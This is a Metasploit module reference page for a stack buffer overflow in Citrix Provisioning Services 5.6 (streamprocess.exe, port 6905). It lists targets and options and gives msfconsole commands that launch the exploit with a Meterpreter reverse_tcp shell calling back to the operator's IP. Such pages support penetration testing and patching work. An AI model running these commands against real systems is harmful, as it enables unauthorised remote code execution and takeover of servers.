Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow | Metasploit Exploit Database (DB)

Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6. By sending a specially crafted packet to the Provisioning Services server, a fixed length buffer on the stack can be overflowed and arbitrary code can be executed.

Search Other Modules


Exploit Rank

  • Good

Exploit Authors

  • mog < >

Vulnerability References


Exploit Targets

  • 0 - Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista (default)

Exploit Development


Similar Exploit Modules


Exploit Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use exploit/windows/misc/citrix_streamprocess
msf exploit(citrix_streamprocess) > show payloads
msf exploit(citrix_streamprocess) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(citrix_streamprocess) > set LHOST [MY IP ADDRESS]
msf exploit(citrix_streamprocess) > set RHOST [TARGET IP]
msf exploit(citrix_streamprocess) > exploit


Exploit Module Options

RHOST The target address
RPORT The target port (default: 6905)
CHOST The local client address
CPORT The local client port
ContextInformationFile The information file that contains context information
DisablePayloadHandler Disable the handler code for the selected payload
EnableContextEncoding Use transient context when encoding payloads
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module
WfsDelay Additional delay when waiting for a session